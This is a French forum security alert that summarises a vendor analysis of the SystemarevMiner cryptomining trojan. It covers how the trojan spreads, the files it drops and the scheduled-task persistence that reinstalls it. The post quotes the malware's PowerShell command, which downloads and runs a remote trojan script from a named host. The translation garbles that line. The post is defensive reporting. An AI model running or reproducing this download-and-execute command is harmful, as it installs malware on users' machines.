Cryptominer (minage) SystemarevMiner (17.07.18)

Avis et alertes de sécurité au jour le jour (aucune question posée dans ce sous-forum)

Modérateur: Modérateurs et Modératrices

Cryptominer (minage) SystemarevMiner (17.07.18)

Messagede pierre » 18 07 2018

Cryptominer (minage de cryptomonaie) nommé SystemarevMiner

Qiho 360, une société chinoise de sécurité informatique, publie un papier aujourd'hui : l'éradication du cryptominer "SystemarevMiner" est insuffisante car il se réinstalle automatiquement.

Extraits traduits :

360 Security Center a récemment trouvé un cheval de Troie de type Cryptominer qui se répand activement dans la nature. Ce cheval de Troie cache les malwares de cryptojacking derrière certaines tâches planifiées pour éviter la détection du logiciel antivirus. De plus, même si le cheval de Troie est déjà détecté et supprimé, le cheval de Troie peut toujours être en vie tant que le fichier de script existe. Nous l'avons nommé "SystemarevMiner".

Une analyse

Le cheval de Troie est principalement installé sur l'ordinateur de l'utilisateur via le plug-in du jeu et les failles du logiciel. Relâchez les fichiers suivants après avoir téléchargé le package d'installation:
c: \ programmes \ systemarev \ revservicesx \ app_loader.exe
c: \ program files \ systemarev \ revservicesx \ systemupdate64x.exe
C: \ Program Files \ Fichiers communs \ restore_rev.bat

Créez plusieurs tâches planifiées et programmes de démarrage de service:

Le fichier restore_rev.bat est défini comme propriété masquée et ajouté aux tâches planifiées. Le fichier batch utilisera Powershell pour télécharger le nouveau script de cheval de Troie Powershell:
powershell -ExecutionPolicy ByPass -WindowStyle Caché -Command "iex ((nouvel-objet net.webclient) .DownloadString ('http://77.super-me.online/files/restore_rev_inj.ps1'))"

Vos antivirus sont là pour analyser ce qui se passe.

Cordialement,
Avatar de l’utilisateur
pierre
 
Messages: 23346
Inscription: 20 05 2002
Localisation: Ici et maintenant

Retourner vers Alertes

Qui est en ligne

Utilisateurs parcourant ce forum: Aucun utilisateur enregistré et 3 invités